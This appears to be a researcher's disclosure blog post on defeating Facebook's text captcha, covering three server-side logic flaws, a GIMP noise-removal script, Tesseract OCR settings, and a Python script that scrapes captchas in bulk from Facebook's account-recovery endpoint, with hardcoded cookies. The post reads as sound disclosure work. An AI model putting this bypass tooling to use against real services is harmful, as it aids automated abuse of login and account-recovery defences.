The Facebook Captcha(s)
I've seen Facebook use two captchas. The first is the friend photo captcha, where you are required to select your friends in pictures. This one seemed hard to bypass (except when you attack your friend's account and know all of their friends).
The second type is the text-based captcha, where you just enter the letters/numbers shown in the image. Something like this:
Let's look at some ways to bypass the text captcha :)
A couple of logic flaws...
My original aim was to focus on OCR with Tesseract but it turns out the captcha had logic flaws as well.
Issue #1 - When entering the captcha not all of the characters needed to be correct. If you got one character wrong it would still be accepted.
Issue #2 - The captcha check is case insensitive. Despite using uppercase and lowercase letters in the captcha images, the server didn't actually verify the case of user input.
Issue #3 - Captcha repetition...
Each captcha should have contained a dynamically generated string randomly chosen from a pool of 62^7 possibilities. For some reason though I encountered repetition. This is obviously very bad as with a limited set of captchas an attacker can just download every image, solve them all and achieve a 100% bypass rate in the future. I have no idea what the cause of this issue was and Facebook didn't release any details.
The logic flaws were interesting but let's not forget OCR as well!
Back to the image...
Let's take a look at a Facebook captcha image:
When thinking about OCR analysis there's some things to note:
- Letters/numbers themselves are clearly displayed in black - Good
- Minimal overlaying, wiggling and distortion is used - Good
- Black scribbles add noise to the background - Bad
- White scribbles effectively remove pixels from the characters - Bad
Step #1 Cleaning
I chose to use Gimp for my image cleaning as it was a program I was familiar with and it offered command line processing with Python. While the documentation (here and here) and debugging aren't too good, it gets the job done.
So first up I loaded the image and increased its size, I found processing a smaller image was less accurate and would reduce the quality of the final image.
#Load image image = pdb.gimp_file_load(file, file) drawable = pdb.gimp_image_get_active_layer(image) #Double image size pdb.gimp_image_scale(image,560,142)
Next I removed the background noise. By selecting by black and then shrinking the selection, the thin black lines would be unselected, leaving just the black letters. To actually paint over the noise I just had to re-grow my selection, invert and paint white.
#Select by color black pdb.gimp_by_color_select(drawable,"#000000",20,2,0,0,0,0) #Shrink selection by 1 pixel pdb.gimp_selection_shrink(image,1) #Grow selection by 2 pixels pdb.gimp_selection_grow(image,2) #Fill black pdb.gimp_context_set_foreground((0,0,0)) pdb.gimp_edit_fill(drawable,0) pdb.gimp_edit_fill(drawable,0) pdb.gimp_edit_fill(drawable,0) #Invert selection pdb.gimp_selection_invert(image) #Fill white pdb.gimp_context_set_foreground((255,255,255)) pdb.gimp_edit_fill(drawable,0)
With the outside black noise removed I inverted again to reselect the letters/numbers then translated up and down, painting after each translation. This helped fill in the white lines that in general streaked horizontally through the black characters.
#Invert selection pdb.gimp_selection_invert(image) pdb.gimp_context_set_foreground((0,0,0)) #Translate selection up 4 pixels and paint pdb.gimp_selection_translate(image,0,4) pdb.gimp_edit_fill(drawable,0) #Translate selection down 10 pixels and paint pdb.gimp_selection_translate(image,0,-10) pdb.gimp_edit_fill(drawable,0)
With the processing done I resized the image back to its original size and saved it.
#Resize image pdb.gimp_image_scale(image,280,71) #Export pdb.gimp_file_save(image, drawable, file, file) pdb.gimp_image_delete(image)
I've included the full script at the bottom of this post. I ran it with the following command:
gimp-console-2.8.exe -i -b "(python-clean RUN-NONINTERACTIVE \"test.png\")" -b "(gimp-quit 0)"
As an example, cleaning the image above I got this:
Step #2 Submitting to Tesseract
With the image now cleaned it was ready for Tesseract. To improve the accuracy of results I selected the single word mode (-psm 8) and used a custom character set (nobatch fb).
tesseract.exe test.jpg output -psm 8 nobatch fb
I created the fb character set in "C:\Program Files (x86)\Tesseract-OCR\tessdata\configs", it contained the following whitelist:
tessedit_char_whitelist abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Step #3 Automate everything with Python
I didn't bother to build a fully working POC to automate a real attack - I'm leaving this step as homework for you guys, best script wins $1 via Paypal ;) (I am of course joking don't actually do this!)
Theoretically though if you did want to build a fully functioning script you'd just need to take the python script from my Bugcrowd post and cleaning script from this post, combine and pwn.
Also the following can be used to download Facebook captchas after you have triggered the Facebook defenses:
from urllib.error import * from urllib.request import * from urllib.parse import * import re import subprocess def getpage(): try: print("[+] POSTing to fb"); params = {'lsd':'AVrQ4y7A', 'email':'09262073366', 'did_submit':'Search', '__user':'0', '__a':'1', '__dyn':'7wiUdp87ebG58mBWo', '__req':'p','__rev':'1114696','captcha_persist_data':'abc','recaptcha_challenge_field':'','captcha_response':'abc','confirmed':'1'} data = urlencode(params).encode('utf-8') request = Request("https://www.facebook.com/ajax/login/help/identify.php?ctx=recover") request.add_header('Cookie', 'locale=en_GB;datr=Ku2xUhSA3kShtkMud0JXRHCY; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2F%3Fstype%3Dlo%26jlou%3DAfco_1iUuf5XPNAuu9SBYhFnEoJfgxIw_9vwHlTfaTRjGB2Ac4VOSLHb018RjcLg3JVRsiY-sQlRSM00X59eKhLh5SJGHltQ0hEQ2WAiRR9A_g%26smuh%3D28853%26lh%3DAc-vs8zSU-_-6kh2%26aik%3Dqh9ABV52OPB3zXxCyUTNXw;') #Send request and analyse response f = urlopen(request, data) response = f.read().decode('utf-8') global ccode ccode = re.findall('[a-z0-9-]{43}', response) global chash chash = re.findall('[a-zA-Z0-9_-]{814}', response) print("[+] Parsed response"); except URLError as e: print ("*****Error: Cannot retrieve URL*****"); def getcaptcha(i): try: print("[+] Downloading Captcha"); captchaurl = "https://www.facebook.com/captcha/tfbimage.php?captcha_challenge_code="+ccode[0]+"&captcha_challenge_hash="+chash[1] urlretrieve(captchaurl,'fbcap'+str(i)+'.png') except URLError as e: print ("*****Error: Cannot retrieve URL*****"); print("[+] Start!"); for i in range(0, 1000): #Download page and parse data getpage(); #Download captcha image getcaptcha(i); print("[+] Finished!");
Final Results
So I guess you're wondering, how accurate was Tesseract? Well on a sample of 50 captchas that had been cleaned with Gimp, Tesseract was able to analyse them 100% correctly about 20% of the time. However taking into account the logic flaws the actual pass rate jumped to 50%.
Some example results:
It's quite impressive seeing how well both the Gimp cleaning and Tesseract analysis performed. Although you can also see how even subtle changes in the initial image can significantly affect both cleaning output and final analysis.
Facebook Fix #1
After reporting these issues the captcha repetition was addressed pretty quickly. The other logic flaws were left unchanged. The image itself was modified to make the characters/noise thicker:
Unfortunately this had little effect on the captcha strength as it's the noise to character relative thickness that mattered not the absolute thickness. Making the noise thicker and characters thinner, would have prevented noise removal through selection shrinking.
Final Thoughts
Another day, another captcha bypass. Whether you use Tesseract or a bad-ass custom neural network like Google or Vicarious, text captchas can be bypassed with relative ease. I managed a 20% pass-rate, I'm sure with a better cleaning process and/or Tesseract training this could be pushed a lot higher. It's time to ditch that text captcha.
Facebook said that right now the captcha is used more as a mechanism to slow down attacks as opposed to stopping attacks completely. The captcha will eventually be fixed but there are no plans at the moment.
Shout out to Facebook security for their help looking into this issue. Thanks for reading. Questions and comments are always appreciated, just leave a message below.
Pwndizzle out
############################################
#Gimp-Fu cleaning script, based on stackoverflow script here:
#http://stackoverflow.com/questions/12662676/writing-a-gimp-python-script?rq=1
from gimpfu import pdb, main, register, PF_STRING
def clean(file):
#Load image
image = pdb.gimp_file_load(file, file)
drawable = pdb.gimp_image_get_active_layer(image)
#Double image size
pdb.gimp_image_scale(image,560,142)
#Select by color black
pdb.gimp_by_color_select(drawable,"#000000",20,2,0,0,0,0)
#Shrink selection by 1 pixel
pdb.gimp_selection_shrink(image,1)
#Grow selection by 2 pixels
pdb.gimp_selection_grow(image,2)
#Fill black
pdb.gimp_context_set_foreground((0,0,0))
pdb.gimp_edit_fill(drawable,0)
pdb.gimp_edit_fill(drawable,0)
pdb.gimp_edit_fill(drawable,0)
#Invert selection
pdb.gimp_selection_invert(image)
#Fill white
pdb.gimp_context_set_foreground((255,255,255))
pdb.gimp_edit_fill(drawable,0)
#Invert selection
pdb.gimp_selection_invert(image)
pdb.gimp_context_set_foreground((0,0,0))
#Translate selection up 4 pixels and paint
pdb.gimp_selection_translate(image,0,4)
pdb.gimp_edit_fill(drawable,0)
#Translate selection down 10 pixels and paint
pdb.gimp_selection_translate(image,0,-10)
pdb.gimp_edit_fill(drawable,0)
#Resize image
pdb.gimp_image_scale(image,280,71)
#Export
pdb.gimp_file_save(image, drawable, file, file)
pdb.gimp_image_delete(image)
args = [(PF_STRING, 'file', 'GlobPattern', '*.*')]
register('python-clean', '', '', '', '', '', '', '', args, [], clean)
main()
############################################